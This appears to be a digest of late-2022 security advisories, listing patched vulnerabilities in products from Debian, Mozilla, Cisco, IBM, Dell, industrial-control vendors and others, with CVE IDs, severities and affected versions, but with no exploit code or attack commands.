Multiple vulnerabilities have been discovered in Hitachi Energy's Equipment- MicroSCADA
Pro/X SYS600, and IED Connectivity Packages and PCM600 products. Security
updates/mitigations are available.
CVE ID: CVE-2022-3388 (High), CVE-2022-2513 (High)
Debian has released a security update to resolve several vulnerabilities in the Mozilla Firefox
ESR package.
CVE ID: CVE-2022-45403, CVE-2022-45404, CVE-2022-45405, CVE-2022-45406,
CVE-2022-45408, CVE-2022-45409, CVE-2022-45410, CVE-2022-45411, CVE-2022-45412,
CVE-2022-45416, CVE-2022-45418, CVE-2022-45420, CVE-2022-45421
Dell has released security updates to resolve multiple vulnerabilities in its products. The
affected products are Dell Integrated System for Microsoft Azure Stack Hub versions before
2210, Dell Command | Update versions before 4.7.0 and Dell Update/Alienware Update
versions before 4.7.0.
PHOENIX CONTACT has released a security update to resolve a Denial of Service (DoS)
vulnerability in PHOENIX CONTACT FL MGUARD and TC MGUARD devices.
CVE ID: CVE-2022-3480
PHOENIX CONTACT has released a security update to resolve an automationworx BCP file parsing
vulnerability in Config+, PC Worx & PC Worx Express products that can lead to a heap buffer
overflow, release of unallocated memory or a read access violation due to insufficient
validation of input data.
CVE ID: CVE-2022-3461 (High), CVE-2022-3737 (High)
Mozilla has released updated Thunderbird 102.5, Firefox ESR 102.5 and Firefox 107 to resolve
multiple vulnerabilities. An attacker can exploit these vulnerabilities to take control of
an affected system.
CVE ID: CVE-2022-45403, CVE-2022-45404, CVE-2022-45405, CVE-2022-45406,
CVE-2022-45407, CVE-2022-45408, CVE-2022-45409, CVE-2022-45410, CVE-2022-45411,
CVE-2022-45412, CVE-2022-45413, CVE-2022-45415, CVE-2022-45416, CVE-2022-45417,
CVE-2022-45418, CVE-2022-45419, CVE-2022-45420, CVE-2022-45421, CVE-2022-40674
Ubuntu has released security updates to resolve multiple vulnerabilities in several
products.
CVE ID: CVE-2022-40023, CVE-2020-16845, CVE-2022-41741, CVE-2022-41742
Debian has released a security update to resolve several vulnerabilities in the WordPress
package that allow SQL injection, open redirects, authorization bypass, or
Cross-Site Request Forgery (CSRF) or Cross-Site Scripting (XSS) attacks.
Debian has released a security update to resolve several vulnerabilities in the GRUB2 package
which can result in crashes and potentially execution of arbitrary code.
CVE ID: CVE-2022-2601, CVE-2022-3775
Debian has released a security update to resolve parsing errors in the mp4 module of Nginx
package which can result in Denial of Service (DoS), memory disclosure or potentially the
execution of arbitrary code when processing a malformed mp4 file.
CVE ID: CVE-2022-41741, CVE-2022-41742
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in several Jenkins Plugins. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Dell has released security updates to resolve multiple vulnerabilities in the PowerPath
Management Appliance.
CVE ID: CVE-2022-34446, CVE-2022-34447, CVE-2022-34448, CVE-2022-34449,
CVE-2022-34450, CVE-2022-34451, CVE-2022-34452
Multiple vulnerabilities have been discovered in several Zoom products. The affected
products are Zoom Rooms Installer for Windows before version 5.12.6, Zoom Client for
Meetings Installer for macOS (Standard and for IT Admin) before version 5.12.6, Zoom Client
for Meetings for Windows (32-bit) prior to 5.12.6, Zoom VDI Windows Meeting Client for
Windows (32-bit) prior to 5.12.6 and Zoom Rooms for Conference Room for Windows (32-bit)
prior to 5.12.6.
CVE ID: CVE-2022-28766, CVE-2022-28768, CVE-2022-36924
ABB has released a security update to resolve a cleartext credentials vulnerability in ABB
protection and control IED manager PCM600. The affected versions are PCM600 2.11 and
previous versions, including hotfixes prior to 20220923.
CVE ID: CVE-2022-2513
It has been discovered that Samba's Kerberos libraries and AD DC fail to guard against
integer overflows when parsing a PAC on a 32-bit system. Successful exploitation with a
forged PAC can corrupt the heap. The affected products are all versions of Samba prior to
4.15.12, 4.16.7, 4.17.3.
CVE ID: CVE-2022-42898
A Realtek chip deadlock vulnerability has been discovered in multiple consumer electronics
products provided by Mitsubishi Electric Corporation when processing a Wi-Fi connection using
the access point mode.
CVE ID: CVE-2022-34326 (High)
An arbitrary command execution vulnerability due to an OpenSSL vulnerability has been
discovered in GT SoftGOT2000. An attacker could execute malicious OS commands by sending a
specially crafted certificate.
CVE ID: CVE-2022-2068 (Critical)
Missing authentication for critical function and path traversal vulnerabilities have
been discovered in Hitachi Kokusai Network products for monitoring systems (Camera, Encoder,
Decoder). The affected products are camera HC, KV, KP series, encoders VG, PT series and
decoders PT series. Security updates are available.
CVE ID: CVE-2022-37680 (High), CVE-2022-37681 (High)
A ClassLoader manipulation vulnerability has been discovered in TERASOLUNA Global Framework
and TERASOLUNA Server Framework for Java (Rich) which is contained in Spring Framework. NTT
DATA Corporation has released security updates to resolve the vulnerability.
CVE ID: CVE-2022-43484
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
An insufficient access control vulnerability has been discovered in the web-based management
interface of Cisco Identity Services Engine (ISE).
CVE ID: CVE-2022-20956 (High)
A Cross-Site Scripting (XSS) vulnerability has been discovered in the External RESTful
Services (ERS) API of Cisco Identity Services Engine (ISE) software. Security updates are
available.
CVE ID: CVE-2022-20959
Debian has released a security update to address a buffer overflow vulnerability in the
xorg-server package, which can result in Denial of Service (DoS) or potentially the
execution of arbitrary code.
CVE ID: CVE-2022-3550 (High), CVE-2022-3551 (High)
Debian has released security updates to address a buffer overflow vulnerability in the php7.4
package, which can result in Denial of Service (DoS), information disclosure, insecure
cookie handling or potentially the execution of arbitrary code.
CVE ID: CVE-2022-31630, CVE-2022-37454 (Critical), CVE-2022-31629 (Medium),
CVE-2022-31628 (Medium)
Pulse Secure has released security updates to resolve multiple vulnerabilities in its
products. The affected products are Ivanti Connect Secure (ICS) in versions prior to
9.1R14.3, 9.1R15.2, 9.1R16.2, and 22.2R4, Ivanti Policy Secure (IPS) in versions prior to
9.1R17 and 22.3R1, and Ivanti Neurons for Zero-Trust Gateway in versions prior to 22.3R1.
CVE ID: CVE-2022-35254, CVE-2022-35258 (High)
Debian has released a security update to address a heap-based buffer overflow vulnerability
in the pixman package, which can result in Denial of Service (DoS) or potentially the
execution of arbitrary code.
CVE ID: CVE-2022-44638 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
MOXA has released security updates to address multiple vulnerabilities in its equipment-
VPort Series. Successful exploitation of the improper input validation control can allow a
remote attacker to cause the RTSP service to crash.
CVE ID: CVE-2022-38157, CVE-2022-38158, CVE-2022-38159
Ubuntu has released security updates to address several vulnerabilities in WavPack, and
Firefox. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-2476 (Medium), CVE-2022-42927 (High), CVE-2022-42928 (High),
CVE-2022-42929 (Medium), CVE-2022-42930 (Medium), CVE-2022-42932 (Medium)
Dell has released security updates for Dell Secure Connect Gateway (SCG) Policy Manager,
Dell Secure Connect Gateway, and Dell Client to address multiple vulnerabilities that can be
exploited by malicious users to compromise the affected system.
CVE ID: CVE-2022-34440 (High), CVE-2022-34441 (High), CVE-2022-34442 (High),
CVE-2022-34462 (High), CVE-2022-28667, CVE-2022-26047
Active Debug Code vulnerability has been discovered in Omron's Equipment- NJ/NX-series
Machine Automation Controllers. Successful exploitation of this vulnerability can allow an
attacker to obtain unauthorized access to the device and cause the device to be in an “out
of service” state or execute a malicious program on the device.
CVE ID: CVE-2022-33971 (High)
Multiple vulnerabilities such as Hard-coded Credentials, and Authentication Bypass by
Capture-replay have been discovered in Omron's Equipment- NJ/NX-series Controllers and
Software. Successful exploitation of these vulnerabilities can allow an attacker to bypass
authentication in the communications connection process to login and operate the controller
products without authorization.
CVE ID: CVE-2022-34151 (Critical), CVE-2022-33208 (High)
Google has released Dev channel 109.0.5410.0 for Windows, Mac and Linux, Stable channel
107.0.5304.110 (Platform version: 15117.111.0/15117.112.0) for most ChromeOS devices, Chrome
Beta 108 (108.0.5359.40) for iOS, and Chrome Dev 109 (109.0.5409.0) for Android.
An information exposure vulnerability has been discovered in the Zoom Client for Meetings
for Android, iOS, Linux, macOS, and Windows.
CVE ID: CVE-2022-28764 (Low)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that the file upload function of Agentflow BPM has insufficient
filtering for special characters in URLs. An unauthenticated remote attacker can exploit
this vulnerability to upload arbitrary files and execute arbitrary code to manipulate the system
or disrupt service.
CVE ID: CVE-2022-39036 (Critical)
An insufficient authentication vulnerability has been discovered in the UPSMON Pro login
function. An unauthenticated remote attacker can exploit this vulnerability to bypass
authentication and obtain administrator privileges to access or control the system or disrupt service.
CVE ID: CVE-2022-38119 (Critical)
Parse Server has released a security update to address a Remote Code Execution vulnerability
via prototype pollution in its products. The affected versions are Parse Server prior to
4.10.18, and prior to 5.3.1 on the 5.X branch.
CVE ID: CVE-2022-39396 (Critical)
It has been discovered that a lack of sandboxing of OpenAPI documents in GitLab CE/EE allows
an attacker to trick a user into clicking on the Swagger OpenAPI viewer and issuing HTTP requests
that affect the victim's account. The affected versions are all versions of GitLab CE/EE
from 12.6 prior to 15.3.5, 15.4 prior to 15.4.4, and 15.5 prior to 15.5.2.
CVE ID: CVE-2022-3726 (Critical)
Debian has released security updates to address multiple vulnerabilities in exiv2, and
xorg-server. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2017-11683 (Medium), CVE-2020-19716 (Medium), CVE-2022-3756 (High),
CVE-2022-3550 (Critical), CVE-2022-3551 (High)
An information disclosure vulnerability has been discovered in AIPHONE's Video Multi-Tenant
System Entrance Stations. The affected products are GT-DMB-N with firmware versions prior to
3.00, GT-DMB with firmware versions prior to 3.00, GT-DMB-LVN with firmware versions prior
to 3.00 and GT-DB-VN with firmware versions prior to 2.00.
CVE ID: CVE-2022-40903 (Medium)
Android has released a security bulletin to resolve multiple vulnerabilities affecting
several Android devices. Security patch levels of 2022-11-05 or later address all of these
issues.
A Remote Code Execution (RCE) vulnerability has been discovered in Roxy Fileman. The
affected version is Roxy Fileman 1.4.6.
CVE ID: CVE-2022-40797 (Critical)
A privilege escalation vulnerability has been discovered in Symantec Endpoint Detection and
Response (SEDR) Appliance. The affected versions are Symantec Endpoint Detection and
Response Appliance prior to 4.7.0.
CVE ID: CVE-2022-37015 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Apple has released security updates to resolve multiple vulnerabilities in macOS Ventura
13.0.1, iOS 16.1.1, and iPadOS 16.1.1. An attacker can exploit these vulnerabilities to take
control of an affected system.
CVE ID: CVE-2022-40303, CVE-2022-40304
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Google has released Chrome Beta 108 (108.0.5359.38) for Android, Beta channel 108.0.5359.40
for Windows, Mac and Linux, and Extended Stable 106.0.5249.181 for Windows and Mac.
An uncontrolled search path element vulnerability has been discovered in EXPRESSCLUSTER X,
and CLUSTERPRO X. The affected versions are CLUSTERPRO X 5.0 for Windows and earlier,
EXPRESSCLUSTER X 5.0 for Windows and earlier, CLUSTERPRO X 5.0 SingleServerSafe for Windows
and earlier, EXPRESSCLUSTER X 5.0 SingleServerSafe for Windows and earlier.
CVE ID: CVE-2022-34825 (Critical)
A weak file and folder permissions vulnerability has been discovered in EXPRESSCLUSTER X,
and CLUSTERPRO X. The affected versions are CLUSTERPRO X 5.0 for Windows and earlier,
EXPRESSCLUSTER X 5.0 for Windows and earlier, CLUSTERPRO X 5.0 SingleServerSafe for Windows
and earlier, EXPRESSCLUSTER X 5.0 SingleServerSafe for Windows and earlier.
CVE ID: CVE-2022-34824 (Critical)
A buffer overflow vulnerability has been discovered in EXPRESSCLUSTER X, and CLUSTERPRO X.
The affected versions are CLUSTERPRO X 5.0 for Windows and earlier, EXPRESSCLUSTER X 5.0 for
Windows and earlier, CLUSTERPRO X 5.0 SingleServerSafe for Windows and earlier,
EXPRESSCLUSTER X 5.0 SingleServerSafe for Windows and earlier.
CVE ID: CVE-2022-34823 (Critical)
A path traversal vulnerability has been discovered in EXPRESSCLUSTER X, and CLUSTERPRO X.
The affected versions are CLUSTERPRO X 5.0 for Windows and earlier, EXPRESSCLUSTER X 5.0 for
Windows and earlier, CLUSTERPRO X 5.0 SingleServerSafe for Windows and earlier,
EXPRESSCLUSTER X 5.0 SingleServerSafe for Windows and earlier.
CVE ID: CVE-2022-34822 (Critical)
A CSV injection vulnerability has been discovered in Activity Log Team Activity Log for
WordPress. The affected versions are Activity Log Team Activity Log 2.8.3 and below for
WordPress.
CVE ID: CVE-2022-27858 (Critical)
A vulnerability has been discovered in QMS Automotive that allows attackers to gain access
to credentials and impersonate other users. The affected products are all versions of QMS
Automotive.
CVE ID: CVE-2022-43958 (Critical)
An authorization bypass vulnerability has been discovered in OpenFGA. The affected versions
are OpenFGA prior to 0.2.5.
CVE ID: CVE-2022-39352 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Netwrix Auditor User
Activity Video Recording component that affects both the Netwrix Auditor server and agents
installed on monitored systems.
CVE ID: CVE-2022-31199 (Critical)
A SQL injection vulnerability has been discovered in WooCommerce Dropshipping WordPress
plugin. The affected versions are WooCommerce Dropshipping WordPress plugin prior to 4.4.
CVE ID: CVE-2022-3481 (Critical)
Microsoft has released security updates to address multiple vulnerabilities in its products.
An attacker can exploit these vulnerabilities to take control of an affected system.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Citrix has released a security update to address multiple vulnerabilities in Citrix Gateway
and Citrix ADC.
CVE ID: CVE-2022-27510, CVE-2022-27513, CVE-2022-27516
Dell has released security updates for Dell EMC VxRail Appliance, and Dell PowerEdge Server
to address multiple vulnerabilities that can be exploited by malicious users to compromise
the affected system.
CVE ID: CVE-2022-23816 (Medium), CVE-2022-23825 (Medium), CVE-2022-26373 (Medium),
CVE-2022-28693 (Medium), CVE-2022-29901 (Medium), CVE-2022-29466, CVE-2022-29515 (Medium),
CVE-2022-21198 (High)
Intel has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Google has released Dev channel 109.0.5399.0 (Platform version: 15231.0.0) for most ChromeOS
devices, Chrome 107 (107.0.5304.105) for Android, Chrome Stable 107 (107.0.5304.101) for
iOS, and Stable channel 107.0.5304.110 for Mac and Linux and 107.0.5304.106/.107 for Windows
to resolve multiple vulnerabilities.
CVE ID: CVE-2022-3885 (High), CVE-2022-3886 (High), CVE-2022-3887 (High),
CVE-2022-3888 (High), CVE-2022-3889 (High), CVE-2022-3890 (High)
GitLab has released Community Edition and Enterprise Edition version 15.5.3 to resolve a
number of regressions and bugs in the 15.5 release and prior versions.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Joomla has released a security update to resolve a Reflected XSS vulnerability in Joomla CMS
com_media. The affected versions are Joomla CMS versions 4.0.0 to 4.2.4.
CVE ID: CVE-2022-27914 (Low)
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
CVE ID: CVE-2022-1552 (High), CVE-2022-36033 (Medium), CVE-2022-38533 (Medium),
CVE-2022-38791 (Medium), CVE-2022-39046 (Medium)
VMware has released security updates to address multiple vulnerabilities in VMware
Workspace ONE Assist.
CVE ID: CVE-2022-31685 (Critical), CVE-2022-31686 (Critical), CVE-2022-31687
(Critical), CVE-2022-31688 (Medium), CVE-2022-31689 (Medium)
It has been discovered that d8s-xml for Python included a potential code-execution backdoor
inserted by a third party. The affected version is d8s-htm 0.1.0.
CVE ID: CVE-2022-44054 (Critical)
It has been discovered that d8s-xml for Python included a potential code-execution backdoor
inserted by a third party. The affected version is d8s-htm 0.1.0.
CVE ID: CVE-2022-44053 (Critical)
Apache has released a security update to address a vulnerability in Apache Ivy that does not
verify the target path when extracting an archive. The affected versions are Ivy 2.4.0 to
2.5.0.
CVE ID: CVE-2022-37865 (Critical)
SAP has released security updates to address several vulnerabilities affecting multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-41203 (Critical), CVE-2021-20223 (Critical), CVE-2022-35737
(Critical), CVE-2022-41204 (Critical)
A buffer overflow vulnerability has been discovered in Azure RTOS USBX. The affected
versions are Azure RTOS USBX prior to 6.1.12.
CVE ID: CVE-2022-39344 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A use of externally-controlled format string vulnerability has been discovered in the GitHub
repository pingcap/tidb. The affected versions are pingcap/tidb prior to 6.4.0, 6.1.3.
CVE ID: CVE-2022-3023 (Critical)
A SQL injection vulnerability has been discovered in CandidATS that allows an attacker to perform CRUD
operations on application databases. The affected version is CandidATS version 3.0.0.
CVE ID: CVE-2022-42744 (Critical)
It has been discovered that IBM InfoSphere Information Server 11.7 is vulnerable to an XML
External Entity Injection (XXE) attack when processing XML data that causes exposure of
sensitive information or can consume memory resources.
CVE ID: CVE-2022-40747 (Critical)
It has been discovered that IBM InfoSphere Information Server 11.7 is vulnerable
to a CSV injection vulnerability that can cause execution of arbitrary commands on the system.
CVE ID: CVE-2022-22425 (Critical)
A command injection vulnerability has been discovered in D-Link DIR-823G that allows an attacker to
execute arbitrary commands via a crafted packet. The affected version is D-Link DIR-823G
v1.0.2.
CVE ID: CVE-2022-43109 (Critical)
A Remote Command Execution (RCE) vulnerability via path traversal has been discovered in
iSpy. The affected version is iSpy v7.2.2.0.
CVE ID: CVE-2022-29774 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-42919, CVE-2022-35737 (High), CVE-2022-40284
Google has released Dev Channel 109.0.5396.2 for Windows, Linux and Mac, Chrome Beta 108
(108.0.5359.30) for iOS, and Chrome Dev 109 (109.0.5394.4) for Android.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Trellix has released security updates to address an XXE Injection vulnerability in Trellix
IPS Manager. The affected versions are Trellix IPS Manager prior to 10.1 Minor release M10.
CVE ID: CVE-2022-3340 (Medium)
Multiple vulnerabilities have been discovered in Nokia's Equipment- ASIK AirScale 5G Common
System Module. Successful exploitation of these vulnerabilities can result in the execution
of a malicious kernel, the running of arbitrary malicious programs, or the running of
modified Nokia programs. The affected versions are Nokia ASIK AirScale: ASIK 474021A.101,
and ASIK 474021A.102 (not affected by CVE-2022-2484).
CVE ID: CVE-2022-2482 (High), CVE-2022-2484 (High), CVE-2022-2483 (High)
Delta Industrial Automation has released a security update to address a path traversal
vulnerability in its equipment- DIALink which can allow an attacker to place malicious code
on the target device. The affected products are DIALink versions prior to v1.5.0.0 Beta 4.
CVE ID: CVE-2022-2969 (High)
Gestionnaire Libre de Parc Informatique (GLPI) has released a security update to address a
SQL injection vulnerability that leads to a time-based attack in the REST API user_token in
GLPI.
CVE ID: CVE-2022-39323 (Critical)
An out-of-bounds vulnerability has been discovered in the GBL parser of Silicon Labs Gecko
Bootloader that allows an attacker to overwrite the flash sign key and OTA decryption key via a malicious
bootloader upgrade. The affected versions are the GBL parser in Silicon Labs Gecko Bootloader
4.0.1 and earlier.
CVE ID: CVE-2022-24936 (Critical)
Centreon has released a security update to address a SQL injection vulnerability that
affects the Contact Groups Form component.
CVE ID: CVE-2022-3827 (Critical)
ETIC Telecom has released a security update to resolve multiple vulnerabilities in its
equipment Remote Access Server (RAS). Successful exploitation of these vulnerabilities can
allow an attacker to obtain sensitive information and compromise the vulnerable device and other
connected machines. The affected versions are all versions of ETIC Telecom RAS 4.5.0 and
prior.
CVE ID: CVE-2022-3703 (Critical), CVE-2022-41607 (High), CVE-2022-40981
(High)
Huawei has released security updates to address a path traversal vulnerability in Huawei
Aslan Children's Watch that can result in accessing or modifying protected system resources.
CVE ID: CVE-2022-44564 (High)
Ubuntu has released security updates to address an incorrect validation vulnerability in
NTFS metadata. The affected products are Ubuntu 22.10, Ubuntu 22.04 LTS, Ubuntu 20.04 LTS,
and Ubuntu 18.04 LTS.
CVE ID: CVE-2022-40284
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-3602 (High), CVE-2022-3786 (High), CVE-2022-20961 (High),
CVE-2022-20956 (High), CVE-2022-20867 (High), CVE-2022-20868 (High), CVE-2022-20951 (High),
CVE-2022-20958 (High), CVE-2022-20969 (Medium), CVE-2022-20963 (Medium), CVE-2022-20937
(Medium), CVE-2022-20962 (Medium), CVE-2022-20960 (Medium), CVE-2022-20942 (Medium),
CVE-2022-20772 (Medium)
Google has released Beta channel 108.0.5359.24 (Platform version: 15183.28.0) for most
ChromeOS devices, Chrome Beta 108 (108.0.5359.28) for Android, and Beta channel
108.0.5359.30 for Mac and Linux and 108.0.5359.29 for Windows.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that Frauscher Sensortechnik GmbH FDS102 for FAdC R2 and FAdCi R2 are
vulnerable to malicious code upload without authentication by using the configuration upload
function. This can lead to a complete compromise of the FDS102 device. The affected versions
are Frauscher Sensortechnik GmbH FDS102 for FAdC R2 and FAdCi R2 v2.8.0 to v2.9.1.
CVE ID: CVE-2022-3575 (Critical)
It has been discovered that a remote unprivileged attacker can interact with the
configuration interface of a Flexi-Compact FLX3-CPUC1 or FLX3-CPUC2 running an affected
firmware version to potentially impact the availability of the FlexiCompact.
CVE ID: CVE-2022-27583 (Critical)
An improper neutralization vulnerability has been discovered in OpenNebula core on Linux that
allows Remote Code Inclusion.
CVE ID: CVE-2022-37425 (Critical)
An improper type validation vulnerability has been discovered in the Socket.io JS library. It is
possible to overwrite the _placeholder object, which allows an attacker to place references
to functions at arbitrary places in the resulting query object.
CVE ID: CVE-2022-2421 (Critical)
Apple has released security updates to resolve multiple vulnerabilities in Xcode 14.1
available for macOS Monterey 12.5 and later. An attacker can exploit these vulnerabilities
to take control of an affected system.
CVE ID: CVE-2022-29187, CVE-2022-39253, CVE-2022-39260, CVE-2022-42797
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Citrix has released a security update to address multiple vulnerabilities in Citrix Hypervisor
8.2 LTSR CU1.
CVE ID: CVE-2022-42316, CVE-2022-42317, CVE-2022-42318, CVE-2022-42323
It has been discovered that in Octopus Server, the API keys of disabled/deleted users are still
usable when access is revoked via an External Auth Provider. The updates are available.
CVE ID: CVE-2022-2572 (High)
OpenSSL has released security updates to address multiple buffer overflow vulnerabilities in
OpenSSL that can result in a crash (causing a Denial of Service (DoS)). The affected versions
are OpenSSL 3.0.0 through 3.0.6.
CVE ID: CVE-2022-3602 (High), CVE-2022-3786 (High)
It has been discovered that multiple buffer overrun vulnerabilities in OpenSSL affect
Juniper Networks Junos OS Evolved. The affected versions are Juniper Networks Junos OS
Evolved versions later than 22.1R1-EVO.
CVE ID: CVE-2022-3602 (High), CVE-2022-3786 (High)
Google has released LTS channel 102.0.5005.184 (Platform Version: 14695.142.0) for most
ChromeOS devices to resolve multiple vulnerabilities.
CVE ID: CVE-2022-3044 (High), CVE-2022-3306 (High), CVE-2022-3305 (High),
CVE-2022-3446 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released security updates to address a buffer overflow vulnerability in Python.
The affected version is Python 3.7.
CVE ID: CVE-2022-37454 (Critical)
Hitachi has released security updates to address multiple vulnerabilities in Hitachi
Infrastructure Analytics Advisor, Hitachi Ops Center Analyzer and Hitachi Ops Center
Viewpoint.
CVE ID: CVE-2022-41552 (Critical), CVE-2020-36605 (Medium), CVE-2022-41553 (Medium),
CVE-2022-3191 (Medium)
A vulnerability has been discovered in lesspipe that allows attackers to execute code via
Perl Storable (pst) files. The affected versions are lesspipe prior to 2.06.
CVE ID: CVE-2022-44542 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Clinic's Patient
Management System. The affected version is Clinic's Patient Management System v1.0.
CVE ID: CVE-2022-40471 (Critical)
An authorization rules bypass vulnerability has been discovered in VMware Spring Security.
The affected products are Spring Security 5.7.0 to 5.7.4, and Spring Security 5.6.0 to
5.6.8. The mitigations are available.
CVE ID: CVE-2022-31692 (High)
CISA has released guidelines to implement phishing-resistant Multi-Factor Authentication
(MFA) to protect against phishing and other known cyber threats.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Microsoft has released Microsoft Edge Stable Channel (Version 107.0.1418.26). This update
contains a fix for CVE-2022-3723, which has an exploit in the wild.
CVE ID: CVE-2022-3723
It has been discovered that a specific function of Mail SQR Expert has insufficient filtering for
special characters, which can cause arbitrary system command execution and can disrupt
service.
CVE ID: CVE-2022-40741 (Critical)
A weak password requirements vulnerability has been discovered in the GitHub repository
thorsten/phpmyfaq. The affected versions are thorsten/phpmyfaq prior to 3.1.8.
CVE ID: CVE-2022-3754 (Critical)
A SQL injection vulnerability has been discovered in School Activity Updates with SMS
Notification. The affected version is School Activity Updates with SMS Notification v1.0.
CVE ID: CVE-2022-39976 (Critical)
An improper access control vulnerability has been discovered in Rockwell Automation's
Equipment- FactoryTalk Alarm and Events Server that can result in a Denial of Service (DoS)
condition. All versions of FactoryTalk Alarm and Events Server are affected by this
vulnerability.
CVE ID: CVE-2022-38744 (High)
SAUTER Controls has released security updates to address a Cross Site Scripting (XSS)
vulnerability in its equipment- moduWeb. Successful exploitation can trick users into
clicking on malicious links and steal sensitive information. The affected version is SAUTER
moduWeb firmware Version 2.7.1.
CVE ID: CVE-2022-40190 (High)
Rockwell Automation has released security updates to address multiple vulnerabilities in its
equipment- Stratix Devices. Successful exploitation of these vulnerabilities can lead to a
Denial of Service (DoS) condition and allow Remote Code Execution (RCE). The affected
versions are all versions of Stratix 5800 switches prior to v16.12.01, and all versions of
Stratix 5400/5410 switches prior to v15.2(7)E2.
CVE ID: CVE-2020-3229 (High), CVE-2020-3219 (High), CVE-2021-1446 (High),
CVE-2020-3200 (High), CVE-2020-3211 (High), CVE-2020-3218 (High), CVE-2020-3209 (Medium),
CVE-2021-1385 (Medium), CVE-2020-3516 (Medium)
An improper input validation vulnerability has been discovered in Trihedral's Equipment-
VTScada. Successful exploitation of this vulnerability can cause a Denial of Service (DoS)
condition in the affected product.
CVE ID: CVE-2022-3181 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Dell has released a security update to address multiple vulnerabilities affecting Dell Client
BIOS that could be exploited by malicious users to compromise the affected system(s).
CVE ID: CVE-2022-34460, CVE-2022-34393
Multiple vulnerabilities have been discovered in AliveCor's Equipment- KardiaMobile.
Successful exploitation can allow stealing or faking personal cardiograms or enabling a
Denial of Service (DoS) attack.
CVE ID: CVE-2022-40703 (Medium), CVE-2022-41627 (Medium)
Debian has released a security update to address multiple vulnerabilities in the thunderbird
package, which can result in denial of service or the execution of arbitrary code.
CVE ID: CVE-2022-42927, CVE-2022-42928, CVE-2022-42929, CVE-2022-42932
Debian has released a security update to address multiple vulnerabilities in the Chromium
package, which can result in the execution of arbitrary code, denial of service or
information disclosure.
CVE ID: CVE-2022-3652, CVE-2022-3653, CVE-2022-3654, CVE-2022-3655, CVE-2022-3656,
CVE-2022-3657, CVE-2022-3658, CVE-2022-3659, CVE-2022-3660, CVE-2022-3661
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cross-Site Scripting (XSS) and SQL injection vulnerabilities have been discovered in Delta
Electronics' equipment - DIAEnergie, which can allow injection of arbitrary code to retrieve
and modify database contents and execute system commands. The affected versions are prior to
v1.9.01.002.
CVE ID: CVE-2022-41701, CVE-2022-40965, CVE-2022-41555, CVE-2022-41702,
CVE-2022-41651, CVE-2022-40967, CVE-2022-41133, CVE-2022-41773
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2020-3433 (High), CVE-2020-3153 (Medium)
It has been discovered that OpenFGA versions prior to 0.2.4 are vulnerable to an
authorization bypass vulnerability. A security update is available.
CVE ID: CVE-2022-39342 (Critical)
A directory traversal vulnerability has been discovered in the web_server /ajax/remove/
functionality of Robustel R1510 version 3.1.16. A specially-crafted network request can lead
to arbitrary file deletion.
CVE ID: CVE-2022-33897 (Critical)
An OS command injection vulnerability has been discovered in the console_main_loop :sys
functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z. A specially-crafted
XCMD can lead to arbitrary command execution.
CVE ID: CVE-2022-29520 (Critical)
Multiple vulnerabilities have been discovered in Delta Electronics' equipment - InfraSuite
Device Master that can cause Remote Code Execution (RCE) and a Denial of Service (DoS)
condition. The affected versions are 00.00.01a and prior.
CVE ID: CVE-2022-41778, CVE-2022-38142, CVE-2022-41779, CVE-2022-41657,
CVE-2022-41772, CVE-2022-40202, CVE-2022-41688, CVE-2022-41644, CVE-2022-41776,
CVE-2022-41629
A Cross-Site Scripting (XSS) vulnerability has been discovered in CKS' equipment- CEVAS
versions prior to 1.01.46 that allows a user to bypass authentication and retrieve data with
specially crafted SQL queries.
CVE ID: CVE-2021-36206
